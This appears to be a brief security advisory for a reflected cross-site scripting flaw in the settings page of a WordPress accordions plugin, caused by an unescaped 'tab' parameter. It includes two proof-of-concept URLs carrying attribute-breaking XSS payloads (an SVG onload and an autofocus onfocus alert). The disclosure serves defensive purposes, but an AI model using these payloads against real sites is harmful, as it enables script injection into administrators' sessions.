The tab GET parameter of the settings page is not sanitised or escaped when being output back in an HTML attribute, leading to a reflected XSS issue.
v < 2.2.29 https://example.com/wp-admin/edit.php?post_type=accordions&page;=settings&tab;=a"><svg%2Fonload%3Dalert(123)%3B%2F%2F><" v < 2.2.30 https://example.com/wp-admin/edit.php?post_type=accordions&page;=settings&tab;=a"+onfocus%3Dalert(%2FXSS%2F)+autofocus%3Dautofocus+b%3D